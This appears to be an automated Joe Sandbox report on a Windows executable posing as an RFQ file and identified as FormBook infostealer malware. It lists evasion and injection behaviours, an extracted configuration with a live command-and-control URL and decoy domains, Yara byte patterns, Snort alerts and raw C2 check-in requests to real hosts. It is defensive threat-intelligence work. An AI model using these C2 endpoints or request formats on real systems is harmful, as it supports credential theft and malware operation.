Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
MKCC-MEC-RFQ-115-2024.exe

Overview

General Information

Sample name:MKCC-MEC-RFQ-115-2024.exe
Analysis ID:1467059
MD5:11ab7d8a50ccafbb4d7b5c9e83e4ff4c
SHA1:1e0d2f0564e8a8dc7237c98e3facc0e1b4b314cf
SHA256:2eb137991ea1e48556d906d1e03bfaed1df13529dd2420031e6fc92b55c076d1
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • MKCC-MEC-RFQ-115-2024.exe (PID: 7720 cmdline: "C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe" MD5: 11AB7D8A50CCAFBB4D7B5C9E83E4FF4C)
    • svchost.exe (PID: 7752 cmdline: "C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • explorer.exe (PID: 3504 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • systray.exe (PID: 7800 cmdline: "C:\Windows\SysWOW64\systray.exe" MD5: 28D565BB24D30E5E3DE8AFF6900AF098)
          • cmd.exe (PID: 7864 cmdline: /c del "C:\Windows\SysWOW64\svchost.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.gb-electric-wheelchairs-8j.bond/ts59/"], "decoy": ["hgptgz684w.top", "gas39.pro", "totalcow.com", "76466.club", "ssweatstudio.com", "nr35.top", "hmstr-drop.site", "kjsdhklssk13.xyz", "lostaino.com", "athenamotel.info", "9332946.com", "ec-delivery-jobs-8j.bond", "complaix.com", "824go.com", "checkout4xgrow.shop", "modleavedepts.online", "shoedio54.com", "topallinoneaccounting.com", "texhio.online", "cn-brand.com", "spotlights-instagram.com", "kgstrengthandperformance.com", "illumonos.com", "asmauardotreschicshoes.com", "732456.app", "uorder.xyz", "scarytube.world", "ujgddhhfeffsfgg2.group", "slumbergrip.com", "anugerahcorp.biz", "genevieveeventrental.com", "wizardatm.com", "pipelin.xyz", "zangbreaker.com", "782akd.top", "theurbangarden.xyz", "relatablemedia.net", "robottts.com", "femininequantumflowcoach.com", "thebeckettfamily.com", "yys1.rest", "f-kd.net", "ycmg5352.com", "babyscan.xyz", "superprinterworld.com", "decorland.online", "anatomiasiedzenia.com", "digitalanju.life", "zu89.top", "dropfile.xyz", "00050516.xyz", "kris1.com", "riedmw.sbs", "osofamilycoffee.com", "redseadivingadventure.com", "momura.xyz", "bvlazaedi.xyz", "vifjzpdi.xyz", "digitalimageryde.shop", "anjay4d.green", "qjjkxi260l.top", "granadaiighting.com", "agenciademarketingtorreon.com", "casinomaxnodepositbonus.icu"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.3876371079.0000000004A70000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000004.00000002.3876371079.0000000004A70000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000004.00000002.3876371079.0000000004A70000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      00000004.00000002.3876371079.0000000004A70000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000004.00000002.3876371079.0000000004A70000.00000040.10000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18839:$sqlite3step: 68 34 1C 7B E1
      • 0x1894c:$sqlite3step: 68 34 1C 7B E1
      • 0x18868:$sqlite3text: 68 38 2A 90 C5
      • 0x1898d:$sqlite3text: 68 38 2A 90 C5
      • 0x1887b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
      Click to see the 33 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x5451:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1bdb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x9bbf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x14aa7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          2.2.svchost.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          2.2.svchost.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x17a39:$sqlite3step: 68 34 1C 7B E1
          • 0x17b4c:$sqlite3step: 68 34 1C 7B E1
          • 0x17a68:$sqlite3text: 68 38 2A 90 C5
          • 0x17b8d:$sqlite3text: 68 38 2A 90 C5
          • 0x17a7b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x17ba3:$sqlite3blob: 68 53 D8 7F 8C
          Click to see the 15 entries

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: Uncommon Svchost Parent Process
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe", CommandLine: "C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe", ParentImage: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe, ParentProcessId: 7720, ParentProcessName: MKCC-MEC-RFQ-115-2024.exe, ProcessCommandLine: "C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe", ProcessId: 7752, ProcessName: svchost.exe
          Sigma detected: Windows Processes Suspicious Parent Directory
          Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe", CommandLine: "C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe", ParentImage: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe, ParentProcessId: 7720, ParentProcessName: MKCC-MEC-RFQ-115-2024.exe, ProcessCommandLine: "C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exe", ProcessId: 7752, ProcessName: svchost.exe

          Snort Signatures

          Timestamp:07/03/24-17:27:15.447591
          SID:2031412
          Source Port:49715
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:07/03/24-17:28:17.173810
          SID:2031412
          Source Port:49717
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:07/03/24-17:26:54.930423
          SID:2031412
          Source Port:49714
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:07/03/24-17:29:39.440629
          SID:2031412
          Source Port:49720
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:07/03/24-17:26:15.356501
          SID:2031412
          Source Port:49711
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:07/03/24-17:28:37.873542
          SID:2031412
          Source Port:49718
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:07/03/24-17:25:55.097431
          SID:2031412
          Source Port:49709
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:07/03/24-17:27:36.550599
          SID:2031412
          Source Port:49716
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:07/03/24-17:29:18.833017
          SID:2031412
          Source Port:49719
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus detection for URL or domain
          Source: http://www.texhio.online/ts59/www.ec-delivery-jobs-8j.bondAvira URL Cloud: Label: malware
          Source: http://www.zu89.top/ts59/Avira URL Cloud: Label: malware
          Found malware configuration
          Source: 00000004.00000002.3876371079.0000000004A70000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.gb-electric-wheelchairs-8j.bond/ts59/"], "decoy": ["hgptgz684w.top", "gas39.pro", "totalcow.com", "76466.club", "ssweatstudio.com", "nr35.top", "hmstr-drop.site", "kjsdhklssk13.xyz", "lostaino.com", "athenamotel.info", "9332946.com", "ec-delivery-jobs-8j.bond", "complaix.com", "824go.com", "checkout4xgrow.shop", "modleavedepts.online", "shoedio54.com", "topallinoneaccounting.com", "texhio.online", "cn-brand.com", "spotlights-instagram.com", "kgstrengthandperformance.com", "illumonos.com", "asmauardotreschicshoes.com", "732456.app", "uorder.xyz", "scarytube.world", "ujgddhhfeffsfgg2.group", "slumbergrip.com", "anugerahcorp.biz", "genevieveeventrental.com", "wizardatm.com", "pipelin.xyz", "zangbreaker.com", "782akd.top", "theurbangarden.xyz", "relatablemedia.net", "robottts.com", "femininequantumflowcoach.com", "thebeckettfamily.com", "yys1.rest", "f-kd.net", "ycmg5352.com", "babyscan.xyz", "superprinterworld.com", "decorland.online", "anatomiasiedzenia.com", "digitalanju.life", "zu89.top", "dropfile.xyz", "00050516.xyz", "kris1.com", "riedmw.sbs", "osofamilycoffee.com", "redseadivingadventure.com", "momura.xyz", "bvlazaedi.xyz", "vifjzpdi.xyz", "digitalimageryde.shop", "anjay4d.green", "qjjkxi260l.top", "granadaiighting.com", "agenciademarketingtorreon.com", "casinomaxnodepositbonus.icu"]}
          Multi AV Scanner detection for submitted file
          Source: MKCC-MEC-RFQ-115-2024.exeReversingLabs: Detection: 39%
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.MKCC-MEC-RFQ-115-2024.exe.1890000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.MKCC-MEC-RFQ-115-2024.exe.1890000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.3876371079.0000000004A70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.3875926072.0000000002E50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.3876413430.0000000004AA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.1479792020.0000000002760000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.1479642617.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1432605564.0000000001890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.1479901352.0000000002790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Machine Learning detection for sample
          Source: MKCC-MEC-RFQ-115-2024.exeJoe Sandbox ML: detected
          Source: MKCC-MEC-RFQ-115-2024.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: Binary string: systray.pdb source: svchost.exe, 00000002.00000002.1480103834.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1480125938.0000000002A12000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1479720964.0000000000640000.00000040.10000000.00040000.00000000.sdmp, systray.exe, systray.exe, 00000004.00000002.3875792331.0000000000670000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: systray.pdbGCTL source: svchost.exe, 00000002.00000002.1480103834.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1480125938.0000000002A12000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1479720964.0000000000640000.00000040.10000000.00040000.00000000.sdmp, systray.exe, 00000004.00000002.3875792331.0000000000670000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: MKCC-MEC-RFQ-115-2024.exe, 00000001.00000003.1425683480.0000000003790000.00000004.00001000.00020000.00000000.sdmp, MKCC-MEC-RFQ-115-2024.exe, 00000001.00000003.1427596238.0000000003960000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1429323514.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1432752916.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1480356280.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1480356280.000000000319E000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000004.00000002.3876726949.0000000004EAE000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000004.00000002.3876726949.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000004.00000003.1480176048.000000000496E000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000004.00000003.1481840987.0000000004B61000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: MKCC-MEC-RFQ-115-2024.exe, 00000001.00000003.1425683480.0000000003790000.00000004.00001000.00020000.00000000.sdmp, MKCC-MEC-RFQ-115-2024.exe, 00000001.00000003.1427596238.0000000003960000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1429323514.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1432752916.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1480356280.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1480356280.000000000319E000.00000040.00001000.00020000.00000000.sdmp, systray.exe, systray.exe, 00000004.00000002.3876726949.0000000004EAE000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000004.00000002.3876726949.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000004.00000003.1480176048.000000000496E000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000004.00000003.1481840987.0000000004B61000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: svchost.pdb source: explorer.exe, 00000003.00000002.3887605921.000000001048F000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000004.00000002.3877340789.000000000525F000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000004.00000002.3876115690.0000000002F46000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: svchost.pdbUGP source: explorer.exe, 00000003.00000002.3887605921.000000001048F000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 00000004.00000002.3877340789.000000000525F000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 00000004.00000002.3876115690.0000000002F46000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_00144696 GetFileAttributesW,FindFirstFileW,FindClose,1_2_00144696
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_0014C93C FindFirstFileW,FindClose,1_2_0014C93C
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_0014C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,1_2_0014C9C7
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_0014F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_0014F200
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_0014F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_0014F35D
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_0014F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_0014F65E
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_00143A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_00143A2B
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_00143D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,1_2_00143D4E
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_0014BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_0014BF27
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then pop esi2_2_00417295
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then pop esi2_2_0041730F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then pop ebx2_2_00407B1A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then pop edi2_2_0040E43A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then pop edi2_2_00416CDB
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4x nop then pop esi4_2_02E67295
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4x nop then pop esi4_2_02E6730F
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4x nop then pop edi4_2_02E5E43A
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4x nop then pop ebx4_2_02E57B1B
          Source: C:\Windows\SysWOW64\systray.exeCode function: 4x nop then pop edi4_2_02E66CDB

          Networking

          barindex
          Snort IDS alert for network traffic
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.9:49709 -> 188.114.97.3:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.9:49711 -> 76.223.105.230:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.9:49714 -> 3.64.163.50:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.9:49715 -> 185.53.179.91:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.9:49716 -> 194.41.37.158:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.9:49717 -> 104.194.9.178:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.9:49718 -> 89.106.200.1:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.9:49719 -> 65.21.196.90:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.9:49720 -> 188.114.96.3:80
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 76.223.105.230 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 188.114.97.3 80Jump to behavior
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.gb-electric-wheelchairs-8j.bond/ts59/
          Performs DNS queries to domains with low reputation
          Source: DNS query: www.bvlazaedi.xyz
          Source: DNS query: www.babyscan.xyz
          Source: DNS query: www.momura.xyz
          Source: DNS query: www.00050516.xyz
          Source: global trafficHTTP traffic detected: GET /ts59/?S0GhCH=DR-Lh8FH5BP&Upql=F3s9qclS9ajlyltz5vx8YuFcODa05tGO2XwI753moUwU8ctXmF/lD/LedP+MQBQFZjkX HTTP/1.1Host: www.checkout4xgrow.shopConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ts59/?Upql=FhTWpBv2wlHh+xqdnZr3Px/MyxZeSSML3WZDSneysGfSXRBJ9ZV2+MGZCGSdE3MN2wai&S0GhCH=DR-Lh8FH5BP HTTP/1.1Host: www.kgstrengthandperformance.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ts59/?Upql=Q0rerqlMM+Mzf1m4EVXcVVXnMVAfvTa9yYuOwxw9IZ3XTRGu1uzNDOvhpqi9CeNRWR+i&S0GhCH=DR-Lh8FH5BP HTTP/1.1Host: www.babyscan.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ts59/?S0GhCH=DR-Lh8FH5BP&Upql=mB8uG6w8zpafFuNLwvQmLBNoWWmhhT+Pa5pMyx7Kkg5PpWq+xUX3NBFKVrOgvyVjJmhQ HTTP/1.1Host: www.gb-electric-wheelchairs-8j.bondConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /ts59/?Upql=eOJ5wRfCg8ODtwLT+RxU2vRwj/ifTX9ZHMiqr0Mmp4jM1anHRZ8cLTgQ01aLoU+CLIq0&S0GhCH=DR-Lh8FH5BP HTTP/1.1Host: www.76466.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 185.53.179.91 185.53.179.91
          Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
          Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
          Source: Joe Sandbox ViewASN Name: SONDERCLOUDLIMITED-AS-APSonderCloudLimitedHK SONDERCLOUDLIMITED-AS-APSonderCloudLimitedHK
          Source: Joe Sandbox ViewASN Name: TEAMINTERNET-ASDE TEAMINTERNET-ASDE
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Users\user\Desktop\MKCC-MEC-RFQ-115-2024.exeCode function: 1_2_001525E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,1_2_001525E2
